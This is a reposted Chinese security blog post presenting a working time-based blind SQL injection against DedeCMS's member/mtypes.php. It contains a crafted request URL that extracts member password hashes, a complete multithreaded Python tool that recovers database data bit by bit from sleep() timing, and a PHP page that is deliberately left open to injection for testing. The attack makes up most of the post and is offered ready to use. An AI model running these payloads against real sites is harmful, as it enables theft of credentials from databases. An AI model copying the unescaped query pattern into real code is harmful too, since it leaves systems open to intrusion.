
A time-based blind injection in the latest DedeCMS (织梦)

Posted: 2015-12-26 22:12:29


Check localhost/data/admin/ver.txt for the installed patch version.

The request (the injection sits in the key of the _FILES[mtypename][tmp_name] array; the condition tests whether the first character of the first dede_member pwd is ASCII 50, i.e. '2'):

member/mtypes.php?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name][a' and `'`.``.mtypeid or if(ascii(substr((select pwd from dede_member limit 1),1,1))%3d50,1,0) and mtypeid%3d1%23]=名字&_FILES[mtypename][size]=.xxxx

DedeCMS's default filtering kills the usual injection payloads, so you have to enumerate by hand: try each possible letter one at a time and read the result off the ASCII table. As written the condition is a plain boolean test; swap the if(...) for a sleep() variant, as the script below does, to read the answer from the response time instead.

If you are as lazy as I am, use the Python script Lcy wrote for running time-based injection, together with the PHP test page it was developed against.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2015-08-29 22:26:17
# @Last Modified by:   Lcy
# @Last Modified time: 2015-08-30 01:37:01
# blog:https://phpinfo.me
# Time-based blind injection tool.
# (The original was Python 2 / urllib2; ported to Python 3 here with the same
# structure. The only behavioural change is the elapsed-time fix in curl().)
import time
import threading
import urllib.request
import requests

res = {}   # bit number (as a string) -> 0/1, filled by the probe threads


class my_threading(threading.Thread):
    """One thread per bit: probes bit `j` (1 = most significant) of character
    `x` of user() and records 1 if the server slept, else 0."""

    def __init__(self, j, x):
        threading.Thread.__init__(self)
        self.j = j
        self.x = x

    def run(self):
        global res
        x = self.x
        j = self.j
        # decoded: username=root' and if(1=(mid(lpad(bin(ord(mid((select user()),x,1))),8,0),j,1)),sleep(2),0)#
        url = ("http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29,"
               + str(x) + ",1%29%29%29,8,0%29," + str(j) + ",1%29%29,sleep%282%29,0%29%23")
        html = request(url)
        verify = 'timeout'
        if verify not in html:
            res[str(j)] = 0
        else:
            res[str(j)] = 1


def request(URL):
    """GET with a 2 s client timeout; a timeout is taken to mean sleep(2) fired.
    The client timeout equals the injected sleep, so there is no margin on a
    slow link: raise the timeout (or shorten the sleep) if bits come out wrong."""
    user_agent = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'}
    req = urllib.request.Request(URL, None, user_agent)
    try:
        resp = urllib.request.urlopen(req, timeout=2)
    except Exception:
        time.sleep(2)
        return 'timeout'
    return resp.read().decode('utf-8', 'replace')


def curl(url):
    """Return the whole seconds a request took. The original used time.clock()
    (CPU time, not wall time) and returned int(end) instead of end - start,
    so it never actually measured the delay; fixed here."""
    try:
        start = time.time()
        requests.get(url)
        end = time.time()
        return int(end - start)
    except requests.RequestException:
        print("Request failed!")
        exit()


def getLength():
    """Find length(user()) by a linear scan: the server sleeps 1 s on a match."""
    i = 0
    while True:
        print("[+] Checking: %s \r" % i)
        url = "http://localhost/demo/1.php?username=root'+and+sleep(if(length((select%20user()))=" + str(i) + ",1,0))%23"
        timeout = curl(url)
        if timeout >= 1:
            print("[+] Data length: %s" % i)
            return i
        i = i + 1


def bin2dec(string_num):
    return int(string_num, 2)


def getData(dataLength):
    """Recover each character from its 8 bits, probed in parallel."""
    global res
    data = ""
    for x in range(dataLength):
        x = x + 1
        threads = []
        for j in range(8):
            j = j + 1
            sb = my_threading(j, x)
            sb.daemon = True
            threads.append(sb)
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        tmp = ""
        for i in range(8):
            tmp = tmp + str(res[str(i + 1)])
        res = {}
        result = chr(bin2dec(tmp))
        print(result)
        data = data + result
        sb = None
    print("[+] ok!")
    print("[+] result:" + data)


if __name__ == '__main__':
    length = getLength()
    getData(length)
The PHP test target (1.php) the script points at:

<?php
/* 
* @Author: Lcy
* @Date:   2015-08-29 22:09:59
* @Last Modified by:   Lcy
* @Last Modified time: 2015-08-30 00:34:31
* Time-based injection test target (deliberately injectable; never deploy it).
* The original used the mysql_* extension, which PHP 7 removed; mysqli calls
* are substituted here and the unescaped interpolation is kept on purpose.
*/
header("Content-type:text/html;charset=utf8");
$link = mysqli_connect("localhost", "root", "", "mysql");
mysqli_set_charset($link, "utf8");
// $_GET['username'] goes straight into the query: this is the injection point
$sql = "SELECT user FROM user where user='{$_GET['username']}'";
echo $sql;
$query = mysqli_query($link, $sql);
echo "This is an injection point with no output at all";

?>
Reposted from: http://www.silic.top/index.php/archives/7/


Original URL: http://www.cnblogs.com/dongchi/p/5079138.html
